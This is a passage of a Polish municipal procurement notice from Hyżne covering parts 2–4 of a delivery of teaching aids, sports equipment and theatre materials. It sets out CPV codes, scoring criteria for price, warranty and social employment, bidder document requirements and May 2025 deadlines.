FEPK.07.12-IP.01-0016/23 Projekt współfiansowany przez Unię Europejską ze środków<br/> Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021<br/>2027.<br/> Zakres dostawy, wymagań Zamawiającego oraz czynności do wykonania przez<br/> Wykonawcę został określony w załączniku do SWZ 3 b, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37441700-8 - Piłki do ćwiczeń</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37421000-5 - Maty gimnastyczne</p> <p class="mb-0">37442900-8 - Różnorodny sprzęt gimnastyczny</p> <p class="mb-0">39162100-6 - Pomoce dydaktyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla części nr 2 <br/>Zakup i dostawa pomocy dydaktycznych oraz sprzętu do integracji sensorycznej.<br/><br/>1.	Zamawiający będzie oceniał oferty według następujących kryteriów: <br/>Nr	Nazwa kryterium	Waga<br/>1	Cena	60<br/>2	Okres gwarancji jakości	30<br/>3	Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	10<br/>Razem	100<br/>2.	Punkty przyznawane będą liczone według następujących wzorów: <br/>Nr i nazwa kryterium	Wzór<br/>1 Cena	Liczba punktów = (Cmin/Co) *waga<br/>gdzie: <br/>Cmin - najniższa cena spośród wszystkich ofert <br/>Co - cena podana w badanej ofercie <br/>2.Okres gwarancji jakości<br/><br/><br/>Dotyczy pozycji nr 2 i 3 z załącznika nr 3b do SWZ	1. Kryterium – „Okres gwarancji jakości”– poszczególnym ofertom zostaną przyznane punkty w oparciu o zadeklarowaną wartość oferowanego okresu gwarancji jakości na zrealizowane dostawy. <br/>Im dłuższy termin gwarancji jakości tym większa liczba przyznanych punktów. Przy czym minimalny wymagany okres gwarancji jakości wynosi 24 miesiące. <br/>2. W przypadku nie uzupełnienia pola – okres gwarancji jakości – Zamawiający domyślnie ustala minimalny wymagany okres jako 24 miesiące. <br/>3. W przypadku wskazania okresu gwarancji jakości niższego niż minimalny wymagany okres tj. 24 miesiące – oferta będzie podlegać odrzuceniu, jako niezgodna z treścią SWZ (art. 226 ust 1 pkt 5) <br/>4. W przypadku wskazania okresu gwarancji jakości wyższego niż 36 miesięcy – oferta uzyska maksymalną ilość punktów w danym kryterium tj. 30 pkt. <br/>5. Punktacja: <br/>- okres 24 m-cy – 0 pkt <br/>- okres 30 m-cy – 15 pkt <br/>- okres 36 m-cy – 30 pkt <br/>6. Maksymalnie w danym kryterium można otrzymać 30 pkt. <br/>3. Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	1.	W ramach tego kryterium Wykonawcy ubiegający się <br/>o zamówienie publiczne mają możliwość zadeklarowania zatrudnienia osób społecznie marginalizowanych <br/>z dowolnej kategorii w obrębie katalogu zdefiniowanego <br/>w art. 94 ust. 1 ustawy Pzp.<br/>2.	Zamawiający dopuszcza zatrudnienie na podstawie stosunku pracy albo umowy cywilnoprawnej, w zależności od charakteru czynności, jakie będą wykonywały osoby z grup społecznie marginalizowanych.<br/>3.	Deklarowane zatrudnienie osób z grup społecznie marginalizowanych musi obejmować co najmniej 5 godzin tygodniowo w odniesieniu do każdej z zatrudnionych osób, <br/>w ramach okresu realizacji zamówienia publicznego.<br/>4.	Wykonawca uzyska punkty wyliczone zgodnie z poniższym wzorem:<br/>Liczba punktów = [Lo / Ln] x 100 pkt x 10%<br/> gdzie:<br/>Lo - zadeklarowana liczba osób społecznie marginalizowanych <br/>w badanej ofercie <br/>Ln - najwyższa zadeklarowana liczba osób społecznie marginalizowanych w badanych ofertach <br/>5.	W przypadku braku deklaracji w formularzu ofertowym dotyczącej zatrudnienia osób z grup społecznie marginalizowanych, zamawiający przyzna wykonawcy <br/>0 punktów w tym kryterium.<br/>6.	Maksymalnie w danym kryterium można otrzymać 10 pkt.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu. Obliczenie będzie dokonywane <br/>z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3.<br/>Zakup i dostawa sprzętu sportowego.<br/><br/>Przedmiotem zamówienia jest Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój<br/> edukacji na terenie gminy Hyżne” FEPK.07.12-IP.01-0016/23 Projekt współfiansowany przez Unię Europejską ze środków<br/> Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021<br/>2027.<br/> Zakres dostawy, wymagań Zamawiającego oraz czynności do wykonania przez<br/> Wykonawcę został określony w załączniku do SWZ 3 c, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37461500-2 - Stoły do tenisa stołowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37461520-8 - Rakietki do tenisa stołowego</p> <p class="mb-0">37421000-5 - Maty gimnastyczne</p> <p class="mb-0">37422000-2 - Drążki lub belki gimnastyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla części nr 3 <br/>Zakup i dostawa sprzętu sportowego.<br/>1.	Zamawiający będzie oceniał oferty według następujących kryteriów: <br/>Nr	Nazwa kryterium	Waga<br/>1	Cena	60<br/>2	Okres gwarancji jakości	30<br/>3	Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	10<br/>Razem	100<br/>2.	Punkty przyznawane będą liczone według następujących wzorów: <br/>Nr i nazwa kryterium	Wzór<br/>1 Cena	Liczba punktów = (Cmin/Co) *waga<br/>gdzie: <br/>Cmin - najniższa cena spośród wszystkich ofert <br/>Co - cena podana w badanej ofercie <br/>2.Okres gwarancji jakości<br/><br/>Dotyczy pozycji nr 1 i 7 z załącznika nr 3c do SWZ	1. Kryterium – „Okres gwarancji jakości”– poszczególnym ofertom zostaną przyznane punkty w oparciu o zadeklarowaną wartość oferowanego okresu gwarancji jakości na zrealizowane dostawy. <br/>Im dłuższy termin gwarancji jakości, tym większa liczba przyznanych punktów. Przy czym minimalny wymagany okres gwarancji jakości wynosi 24 miesiące. <br/>2. W przypadku nie uzupełnienia pola – okres gwarancji jakości– Zamawiający domyślnie ustala minimalny wymagany okres jako 24 miesiące. <br/>3. W przypadku wskazania okresu gwarancji jakości niższego niż minimalny wymagany okres tj. 24 miesiące – oferta będzie podlegać odrzuceniu, jako niezgodna z treścią SWZ (art. 226 ust 1 pkt 5) <br/>4. W przypadku wskazania okresu gwarancji jakości wyższego niż 36 miesięcy – oferta uzyska maksymalną ilość punktów w danym kryterium tj. 30 pkt. <br/>5. Punktacja: <br/>- okres 24 m-cy – 0 pkt <br/>- okres 30 m-cy – 15 pkt <br/>- okres 36 m-cy – 30 pkt <br/>6. Maksymalnie w danym kryterium można otrzymać 30 pkt. <br/>4 Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	1.	W ramach tego kryterium Wykonawcy ubiegający się o zamówienie publiczne mają możliwość zadeklarowania zatrudnienia osób społecznie marginalizowanych z dowolnej kategorii w obrębie katalogu zdefiniowanego w art. 94 ust. 1 ustawy Pzp.<br/>2.	Zamawiający dopuszcza zatrudnienie na podstawie stosunku pracy albo umowy cywilnoprawnej, <br/>w zależności od charakteru czynności, jakie będą wykonywały osoby<br/> z grup społecznie marginalizowanych.<br/>3.	Deklarowane zatrudnienie osób z grup społecznie marginalizowanych musi obejmować co najmniej <br/>5 godzin tygodniowo w odniesieniu do każdej <br/>z zatrudnionych osób, w ramach okresu realizacji zamówienia publicznego.<br/>4.	Wykonawca uzyska punkty wyliczone zgodnie <br/>z poniższym wzorem:<br/>Liczba punktów = [Lo / Ln] x 100 pkt x 10%<br/> gdzie:<br/>Lo - zadeklarowana liczba osób społecznie marginalizowanych w badanej ofercie <br/>Ln - najwyższa zadeklarowana liczba osób społecznie marginalizowanych w badanych ofertach <br/>5.	W przypadku braku deklaracji w formularzu ofertowym dotyczącej zatrudnienia osób z grup społecznie marginalizowanych, zamawiający przyzna wykonawcy 0 punktów w tym kryterium.<br/>6.	Maksymalnie w danym kryterium można otrzymać 10 pkt.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu. Obliczenie będzie dokonywane <br/>z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4. <br/>Zakup i dostawa materiałów teatralnych i ekspozycyjnych.<br/><br/>Przedmiotem zamówienia jest Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój<br/> edukacji na terenie gminy Hyżne” FEPK.07.12-IP.01-0016/23 Projekt współfiansowany przez Unię Europejską ze środków<br/> Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021<br/>2027.<br/> Zakres dostawy, wymagań Zamawiającego oraz czynności do wykonania przez<br/> Wykonawcę został określony w załączniku do SWZ 3 d, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39515100-6 - Zasłony</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39298800-5 - Akwaria</p> <p class="mb-0">30195000-2 - Tablice</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla części nr 4<br/>Zakup i dostawa materiałów teatralnych i ekspozycyjnych.<br/><br/>1.Zamawiający będzie oceniał oferty według następujących kryteriów: <br/>Nr	Nazwa kryterium	Waga<br/>1	Cena	60<br/>2	Okres gwarancji jakości	30<br/>3	Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	10<br/>Razem	100<br/><br/>2.Punkty przyznawane będą liczone według następujących wzorów: <br/>Nr i nazwa kryterium	Wzór<br/>1 Cena	Liczba punktów = (Cmin/Co) *waga<br/>gdzie: <br/>Cmin - najniższa cena spośród wszystkich ofert <br/>Co - cena podana w badanej ofercie <br/>2.Okres gwarancji jakości<br/><br/><br/>Dotyczy pozycji nr 2,3,4 załącznika nr <br/>3d do SWZ	1. Kryterium – „Okres gwarancji jakości”– poszczególnym ofertom zostaną przyznane punkty w oparciu o zadeklarowaną wartość oferowanego okresu gwarancji jakości na zrealizowane dostawy. <br/>Im dłuższy termin gwarancji jakości tym większa liczba przyznanych punktów. Przy czym minimalny wymagany okres gwarancji jakości wynosi 24 miesiące. <br/>2. W przypadku nie uzupełnienia pola – okres gwarancji jakości– Zamawiający domyślnie ustala minimalny wymagany okres jako 24 miesiące. <br/>3. W przypadku wskazania okresu gwarancji jakości niższego niż minimalny wymagany okres tj. 24 miesiące – oferta będzie podlegać odrzuceniu, jako niezgodna z treścią SWZ (art. 226 ust 1 pkt 5) <br/>4. W przypadku wskazania okresu gwarancji jakości wyższego niż 36 miesięcy – oferta uzyska maksymalną ilość punktów w danym kryterium tj. 30 pkt. <br/>5. Punktacja: <br/>- okres 24 m-cy – 0 pkt <br/>- okres 30 m-cy – 15 pkt <br/>- okres 36 m-cy – 30 pkt <br/>6. Maksymalnie w danym kryterium można otrzymać 30 pkt. <br/>3. Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	7.	W ramach tego kryterium Wykonawcy ubiegający się <br/>o zamówienie publiczne mają możliwość zadeklarowania zatrudnienia osób społecznie marginalizowanych <br/>z dowolnej kategorii w obrębie katalogu zdefiniowanego <br/>w art. 94 ust. 1 ustawy Pzp.<br/>8.	Zamawiający dopuszcza zatrudnienie na podstawie stosunku pracy albo umowy cywilnoprawnej, w zależności od charakteru czynności, jakie będą wykonywały osoby z grup społecznie marginalizowanych.<br/>9.	Deklarowane zatrudnienie osób z grup społecznie marginalizowanych musi obejmować co najmniej 5 godzin tygodniowo w odniesieniu do każdej z zatrudnionych osób, <br/>w ramach okresu realizacji zamówienia publicznego.<br/>10.	Wykonawca uzyska punkty wyliczone zgodnie z poniższym wzorem:<br/>Liczba punktów = [Lo / Ln] x 100 pkt x 10%<br/> gdzie:<br/>Lo - zadeklarowana liczba osób społecznie marginalizowanych <br/>w badanej ofercie <br/>Ln - najwyższa zadeklarowana liczba osób społecznie marginalizowanych w badanych ofertach <br/>11.	W przypadku braku deklaracji w formularzu ofertowym dotyczącej zatrudnienia osób z grup społecznie marginalizowanych, zamawiający przyzna wykonawcy <br/>0 punktów w tym kryterium.<br/>12.	Maksymalnie w danym kryterium można otrzymać 10 pkt.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu. Obliczenie będzie dokonywane <br/>z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5. Oferta musi zawierać:<br/> 1) wypełniony formularz OFERTA - musi być złożony w formie elektronicznej tj. przekazany w postaci elektronicznej i<br/> opatrzony kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/> podpisem osobistym;<br/> 2) oświadczenie/a o braku podstaw wykluczenia zawarte w formularzu OFERTA– musi być złożone w formie elektronicznej tj. przekazane w postaci elektronicznej i opatrzone kwalifikowanym podpisem<br/> elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/> 3) oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego w SWZ<br/> zawarte w formularzu OFERTA – musi być złożone w formie elektronicznej tj. przekazane w postaci elektronicznej i<br/> opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/> podpisem osobistym;<br/> 4) zobowiązanie podmiotu udostępniającego zasoby lub inny dokument (jeśli dotyczy) – musi być złożone w formie<br/> elektronicznej tj. przekazane w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym lub w postaci<br/> elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/> 5) oświadczenie o braku podstaw do wykluczenia podmiotu udostępniającego zasoby (zawarte w druku wzór zobowiązania<br/> podmiotu udostępniającego zasoby ) musi być złożone w formie elektronicznej tj. przekazane w postaci elektronicznej i<br/> opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/> podpisem osobistym (wymagane gdy Wykonawca składa dokumenty z pkt. 4)<br/> 6) oświadczenie o spełnianiu warunków udziału w postępowaniu podmiotu udostępniającego zasoby (w zakresie, w jakim<br/> wykonawca powołuje się na jego zasoby) - (zawarte w druku wzór zobowiązania podmiotu udostępniającego zasoby )<br/> musi być złożone w formie elektronicznej tj. przekazane <br/>w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej<br/> podpisem zaufanym lub podpisem osobistym (wymagane gdy Wykonawca składa dokumenty z pkt. 4)<br/> 7) pełnomocnictwo – jeśli wymagane do reprezentowania Wykonawcy/ów <br/>w przypadku, gdy:<br/> a) Wykonawcę reprezentuje pełnomocnik,<br/> b) ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia publicznego o treści wymaganej w art. 58<br/> ust. 2 Pzp (dotyczy również wspólników spółki cywilnej) musi być złożone w formie elektronicznej tj. przekazane w postaci<br/> elektronicznej i podpisane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/> zaufanym lub podpisem osobistym<br/> 8) dokument/y potwierdzający/e umocowanie do reprezentowania Wykonawcy i/lub podmiotu udostepniającego zasoby<br/> muszą być złożone zgodnie z zasadami wskazanymi w ust. 6-17.<br/> Dokument/y potwierdzający/e umocowanie do reprezentowania podmiotu udostepniającego zasoby składane są tylko w<br/> przypadku korzystania z jego zasobów w celu potwierdzenia spełniania warunków.<br/> 9) Kalkulacja ceny – Opis przedmiotu zamówienia - musi być złożony formie elektronicznej tj. przekazany w postaci<br/> elektronicznej i opatrzony kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/> zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,<br/> 6.1 W przypadku składania oferty wspólnej przez kilku wykonawców, każdy <br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty i oświadczenia wskazane w<br/> rozdziale V pkt. 2.1., VI.2.1 i VI.2.2<br/> Pozostałe dokumenty będą traktowane jako wspólne.<br/> 6.2. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich<br/> w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do OFERTY należy<br/> dołączyć stosowne pełnomocnictwo w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/> podpisem osobistym przez osobę lub osoby upoważnione do składania oświadczeń woli każdego <br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/> 6.3. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za niewykonanie<br/> lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.<br/> 6.4. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem. <br/>6.5. W formularzu OFERTA w miejscu „nazwa i adres wykonawcy” należy<br/> wpisać dane dotyczące wszystkich podmiotów wspólnie ubiegających<br/> się o udzielenie zamówienie, a nie tylko pełnomocnika.<br/> 6.6. W formularzu OFERTA należy wskazać, które usługi wykonają poszczególni wykonawcy wspólnie ubiegający się o<br/> udzielenie zamówienia.<br/> 6.7. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie<br/> ubiegających się o udzielenie zamówienia kluczowych zadań.<br/> 6.8. Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została<br/> wybrana Zamawiający będzie żądać umowy regulującej ich współpracę.<br/> Szczegółowo opisano w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikami do SWZ<br/>2 a. dla części nr 1.<br/>2 b. dla części nr 2, 3, 4. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-09 10:50</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ZETOPZP: https://pzp.hyzne.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-09 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 4. Podstawy wykluczenia o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/> zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (zwanej<br/> dalej ustawą o szczególnych rozwiązaniach)<br/> 4.1. Zamawiający wykluczy wykonawcę na podstawie art. 7 ust. 1 ustawy <br/>o szczególnych rozwiązaniach w przypadku wystąpienia którejkolwiek <br/>z określonych w niej przesłanek, tj:<br/> 4.1.1 wymienionego w wykazach określonych w rozporządzeniu 765/2006 <br/>i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/> zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach;<br/> 4.1.2 którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w<br/> rozporządzeniu 765/2006<br/> i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o<br/> ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/> mowa w art. 1 pkt 3 Ustawy o szczególnych rozwiązaniach ;<br/> 4.1.3 którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości<br/> (Dz. U. z 2021 r. 